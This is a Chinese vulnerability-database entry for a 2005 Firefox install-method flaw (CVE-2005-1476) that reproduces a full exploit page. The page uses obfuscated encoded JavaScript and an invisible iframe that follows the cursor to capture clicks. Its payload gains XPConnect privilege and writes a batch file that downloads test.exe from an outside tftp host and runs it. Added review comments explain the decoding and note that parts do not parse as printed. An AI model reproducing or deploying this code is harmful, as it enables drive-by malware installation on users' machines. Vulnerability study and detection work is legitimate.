Mozilla Firefox安装方式远程执行任意代码漏洞

Mozilla Firefox安装方式远程执行任意代码漏洞

漏洞ID 1108759 漏洞类型 输入验证
发布时间 2005-05-07 更新时间 2005-10-25
CVE编号 CVE-2005-1476
CNNVD-ID CNNVD-200505-935
漏洞平台 Windows CVSS评分 5.1
|漏洞来源
https://www.exploit-db.com/exploits/986
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-935
|漏洞详情
Mozilla Firefox 是一款非常流行的开放源码 Web 浏览器。Mozilla Firefox 在安装方式的实现上存在漏洞,可能导致无需用户交互即可执行任意代码。对该漏洞的最初分析表明,它可被用来伪造浏览器状态栏信息,并允许任意脚本获得 UniversalXPConnect 权限。但据进一步观察,该漏洞还可被远程利用,在存在漏洞的计算机上以运行受影响浏览器的用户的权限执行特权操作。厂商安全公告见下文参考资料中的 MFSA 2005-42。
|漏洞EXP
<!-- 
1) wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/986.js (05072005.js)
2) change src= below
3) edit index and change tftp location

/str0ke
-->

<html><head><title>hide me bitch</title>
	
	<meta http-equiv="Expires" content="Tue, 16 Jan 1990 21:29:02 GMT">


			<script language="javascript" src="https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/986.js"></script></head>


<body>


<script language="JavaScript"><!--
// Decode(): hands six encoded string fragments, in order, to d(). d() (defined in the
// next script block) decodes each fragment with codeIt() and appends the result to the
// global string ky; the page then emits ky with document.write(). Always returns 0.
//
// Analysis note: the fragments are the page's own markup in substituted form, so strings
// such as the privilege request and the file-write calls do not appear in the raw HTML.
// Static matching on the delivered source will not see them; inspect the decoded DOM
// (the clear-text markup later in this listing appears to be that decoded output).
//
// NOTE(review): as printed, several literals contain unescaped double quotes (for example
// `(", #)` in the first fragment), so this listing is not valid JavaScript as shown;
// presumably escaping was lost when the page was extracted.
function Decode() {
d("4CSDMFB JUHOAUOQ=0LU9UCSDMFB034!--nPAHSBMGH OQBuFFZQDCMGH(){nUFFHUIQ= HU9MOUBGD.UFFhUIQ;nUFF9QDCMGH = HU9MOUBGD.UFFZQDCMGH;nIULGD9QD = UFF9QDCMGH.CATCBDMHO(", #);nMP ( (UFFHUIQ == 0hQBCSUFQ0) && ( IULGD9QD 3= > ) ) DQBADH #;nMP ( (UFFHUIQ == 0iMSDGCGPB mHBQDHQB q7FJGDQD0) && (IULGD9QD 3= <) ) DQBADH #;nDQBADH ";n}n//--34/CSDMFB34NBIJ34NQUR34BMBJQ3NMRQ IQ TMBSN4/BMBJQ34/NQUR34TGR63M SUH BQJJ 6GA 6GAD ACQDHUIQ IUOMSUJJ6 BNDGAON BNQ MHBQDHQB!!4TD3sJMSK 4U NDQP=0103nqdq4/U3MHCMRQ BNMC FUOQ BG OQB BN");
d("Q NMRRQH UHC8QD!4TD34MPDUIQ GHJGUR=0JGURQD()0 CDS=0LU9UCSDMFB:'4HGCSDMFB3'+Q9UJ('MP (8MHRG8.HUIQ!=\'CBQUJSGGKMQC\'){8MHRG8.HUIQ=\'CBQUJSGGKMQC\';}  QJCQ{ Q9QHB={BUDOQB:{NDQP:\'NBBF://PBF.IG5MJJU.GDO/FAT/IG5MJJU.GDO/Q7BQHCMGHC/PJUCNOGB/PJUCNOGB-".z.v.#-P7+I5+BT.7FM\'}};MHCBUJJ(Q9QHB,\'WGA UDQ 9AJHQDUTJQ!!!\',\'LU9UCSDMFB:Q9UJ(\\\'HQBCSUFQ.CQSADMB6.fDM9MJQOQiUHUOQD.QHUTJQfDM9MJQOQ(\\\\\\\'aHM9QDCUJXfsGHHQSB\\\\\\\');PMJQ=sGIFGHQHBC.SJUCCQC[\\\\\\\'@IG5MJJU.GDO/PMJQ/JGSUJ;#\\\\\\\'2.SDQUBQmHCBUHSQ(");
d("sGIFGHQHBC.MHBQDPUSQC.HCmjGSUJpMJQ);PMJQ.MHMBYMBNfUBN(\\\\\\\'S:\\\\\\\\\\\\\\\\TGGGI.TUB\\\\\\\');PMJQ.SDQUBQaHMEAQ(sGIFGHQHBC.MHBQDPUSQC.HCmpMJQ.hgdiuj_pmjq_bWfq,<]");GABFABcBDQUI=sGIFGHQHBC.SJUCCQC[\\\\\\\'@IG5MJJU.GDO/HQB8GDK/PMJQ-GABFAB-CBDQUI;#\\\\\\\'2.SDQUBQmHCBUHSQ(sGIFGHQHBC.MHBQDPUSQC.HCmpMJQgABFABcBDQUI);GABFABcBDQUI.MHMB(PMJQ,"7"<|"7"w|"7]",<]",");GABFAB=\\\\\\\'BPBF -M MJJIGT.5UFBG.GDO OQB BQCB.Q7Q S:\\\\\\\\\\\\\\\\BQCB.Q7Q\\\\\\\\HSJC\\\\\\\\HCBUDB S:\\\\\\\\\\\\\\\\BQCB.Q7Q\\\\\");
d("\\\HRQJ %"\\\\\\\\HSJC\\\\\\\';GABFABcBDQUI.8DMBQ(GABFAB,GABFAB.JQHOBN);GABFABcBDQUI.SJGCQ();PMJQ.JUAHSN();\\\')\'); }')+'4/HGCSDMFB34U NDQP=\'NBBFC://URRGHC.AFRUBQ.IG5MJJU.GDO/Q7BQHCMGHC/IGDQMHPG.FNF?MR=]]"&UFFJMSUBMGH=PMDQPG7\' CB6JQ=\'SADCGD:RQPUAJB;\'3&HTCF;&HTCF;&HTCF;4/'+'U3'0 MR=0BUDOQBPDUIQ0 CSDGJJMHO=0HG0 PDUIQTGDRQD=0"0 IUDOMH8MRBN=0"0 IUDOMHNQMONB="0 CB6JQ=0FGCMBMGH:UTCGJABQ; JQPB:"F7; 8MRBN:"F7; NQMONB:yF7; 8MRBN:yF7; IUDOMH:"F7; FURRMHO:"F7; -IG5-GFUSMB6:"034/MPDUIQ34CSDMFB JUHOAUOQ");
d("=0lU9UcSDMFB0 B6FQ=0BQ7B/LU9UCSDMFB03nnRGSAIQHB.GHIGACQIG9Q = PAHSBMGH BDUSKiGACQ(Q) {n    RGSAIQHB.OQBqJQIQHBt6mR(0BUDOQBPDUIQ0).CB6JQ.JQPB = (Q.FUOQX->)+0F70n    RGSAIQHB.OQBqJQIQHBt6mR(0BUDOQBPDUIQ0).CB6JQ.BGF = (Q.FUOQW->)+0F70n}   nn9UD SGAHBQD = ";    nPAHSBMGH JGURQD() {n    SGAHBQD++n    MP(SGAHBQD == #) {n        CBQUJSGGKMQC.PGSAC()n    } QJCQ MP(SGAHBQD == ]) {n        CBQUJSGGKMQC.NMCBGD6.OG(-#)n        //BUDOQBPDUIQ.CB6JQ.RMCFJU6=0HGHQ0;n    }n}nn4/CSDMFB34/TGR634");
d("/NBIJ3");
return 0;}
//--></script>
<script language="JavaScript"><!--
// ky: global accumulator for the decoded page text; starts empty.
// d(msg): decodes msg with codeIt(key, msg) and appends the result to ky.
// key: the substitution alphabet shared by d() and codeIt().
// codeIt(mC, eS): walks eS one character at a time. A character found in the alphabet is
//   replaced by the alphabet character at the mirrored offset around index 33
//   (charAt(33 - dv) above the midpoint, charAt(33 + dv) at or below it); a character not
//   in the alphabet is copied through unchanged. Returns the rebuilt string.
//   The pass-through test reads the global `key`, not the `mC` parameter, so the function
//   only behaves consistently when it is called with `key` itself.
// NOTE(review): the `key` literal as printed ends in `""`, which leaves the quotes
// unbalanced; this line does not parse as shown (likely an extraction artefact).
ky="";function d(msg){ky=ky+codeIt(key,msg);}var key = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz<>]#"";function codeIt (mC, eS) {var wTG, mcH =  mC.length / 2, nS = "", dv;for (var x = 0; x < eS.length; x++) {wTG = mC.indexOf(eS.charAt(x));if (wTG > mcH) {dv = wTG - mcH;nS = nS + mC.charAt(33 - dv);}else {if (key.indexOf(eS.charAt(x)) < 0) {nS = nS + eS.charAt(x)}else {dv = mcH - wTG;nS = nS + mC.charAt(33 + dv);}}}return nS;}
//--></script><script language="JavaScript"><!--
Decode();document.write(ky);//--></script><script language="javascript"><!--
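/**
 * Coarse browser check based on navigator.appName / navigator.appVersion.
 *
 * No call to this function is visible in this listing.
 *
 * @returns {number} 1 when the browser reports itself as "Netscape" with a leading
 *   version digit >= 3, or as "Microsoft Internet Explorer" with a leading version
 *   digit >= 4; otherwise 0.
 */
function getAppVersion() {
    // Declared locally so the check leaves no page-wide globals behind.
    var appName = navigator.appName;
    var appVersion = navigator.appVersion;
    // Only the first character of the version string is inspected, so a
    // two-digit major version such as "10.x" reads as 1.
    var majorVersion = Number(appVersion.substring(0, 1));

    if (appName === "Netscape" && majorVersion >= 3) {
        return 1;
    }
    if (appName === "Microsoft Internet Explorer" && majorVersion >= 4) {
        return 1;
    }
    return 0;
}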
//--></script>i can tell you your username magically through the internet!!<br>Click <a href="#">HERE</a>inside this page to get the hidden answer!<br><iframe onload="loader()" src="javascript:'<noscript>'+eval('if (window.name!='stealcookies'){window.name='stealcookies';}  else{ event={target:{href:'http://ftp.mozilla.org/pub/mozilla.org/extensions/flashgot/flashgot-0.5.9.1-fx+mz+tb.xpi'}};install(event,'You are vulnerable!!!','javascript:eval(\'netscape.security.PrivilegeManager.enablePrivilege(\\\'UniversalXPConnect\\\');file=Components.classes[\\\'@mozilla.org/file/local;1\\\'].createInstance(Components.interfaces.nsILocalFile);file.initWithPath(\\\'c:\\\\\\\\booom.bat\\\');file.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE,420);outputStream=Components.classes[\\\'@mozilla.org/network/file-output-stream;1\\\'].createInstance(Components.interfaces.nsIFileOutputStream);outputStream.init(file,0x04|0x08|0x20,420,0);output=\\\'tftp -i ill[server]oab.zapto.org get test.exe c:\\\\\\\\test.exe\\\\ncls\\\\nstart c:\\\\\\\\test.exe\\\\ndel %0\\\\ncls\\\';outputStream.write(output,output.length);outputStream.close();file.launch();\')'); }')+'</noscript><a href='https://addons.update.mozilla.org/extensions/moreinfo.php?id=220&application=firefox' style='cursor:default;'>   </'+'a>'" id="targetframe" marginwidth="0" marginheight="0" style="margin: 0px; padding: 0px; position: absolute; height: 6px; width: 6px; opacity: 0; left: 504px; top: 280px;" frameborder="0" scrolling="no"></iframe><script language="JavaScript" type="text/javascript">

// Mouse-move handler: on every pointer move, repositions the element with id
// "targetframe" so its top-left corner sits 3px above and 3px left of the pointer.
// The iframe carrying that id is declared on this page as 6px x 6px, absolutely
// positioned, with opacity 0, so the handler keeps an invisible frame centred under the
// cursor; presumably this is so that a click anywhere on the page lands in the frame.
// Review/detection note: a mousemove handler that moves a transparent iframe to the
// pointer position is a strong indicator of click hijacking.
document.onmousemove = function trackMouse(e) {
    document.getElementById("targetframe").style.left = (e.pageX-3)+"px"
    document.getElementById("targetframe").style.top = (e.pageY-3)+"px"
}   

// counter: number of times loader() has run. The iframe on this page invokes loader()
// from its onload attribute, so it counts load events of that frame.
var counter = 0;    
// loader(): two-step sequence driven by successive frame loads.
//   1st call: gives focus to `stealcookies`.
//   2nd call: moves `stealcookies` one entry back in its session history.
//   Later calls do nothing beyond incrementing the counter.
// `stealcookies` is not declared in this script; the iframe's inline script sets
// window.name to 'stealcookies', so it presumably resolves to that named frame (confirm).
function loader() {
    counter++
    if(counter == 1) {
        stealcookies.focus()
    } else if(counter == 2) {
        stealcookies.history.go(-1)
        // Disabled by the author: would hide the frame after the second load.
        //targetframe.style.display="none";
    }
}

</script>
<script language="javascript">postamble();</script>
</body></html>

# milw0rm.com [2005-05-07]
|参考资料

来源:US-CERT
名称:VU#534710
链接:http://www.kb.cert.org/vuls/id/534710
来源:VUPEN
名称:ADV-2005-0493
链接:http://www.frsirt.com/english/advisories/2005/0493
来源:SECUNIA
名称:15292
链接:http://secunia.com/advisories/15292
来源:MISC
链接:https://bugzilla.mozilla.org/show_bug.cgi?id=293302
来源:MISC
链接:https://bugzilla.mozilla.org/show_bug.cgi?id=292691
来源:XF
名称:mozilla-javascript-code-execution(20443)
链接:http://xforce.iss.net/xforce/xfdb/20443
来源:BID
名称:13544
链接:http://www.securityfocus.com/bid/13544
来源:www.mozilla.org
链接:http://www.mozilla.org/security/announce/mfsa2005-42.html
来源:SECTRACK
名称:1013913
链接:http://securitytracker.com/id?1013913
来源:MISC
链接:http://greyhatsecurity.org/vulntests/ffrc.htm
来源:MISC
链接:http://greyhatsecurity.org/firefox.htm
来源:BID
名称:15495
链接:http://www.securityfocus.com/bid/15495
来源:REDHAT
名称:RHSA-2005:435
链接:http://www.redhat.com/support/errata/RHSA-2005-435.html
来源:REDHAT
名称:RHSA-2005:434
链接:http://www.redhat.com/support/errata/RHSA-2005-434.html
来源:FULLDISC
名称:20050508FirefoxRemoteC
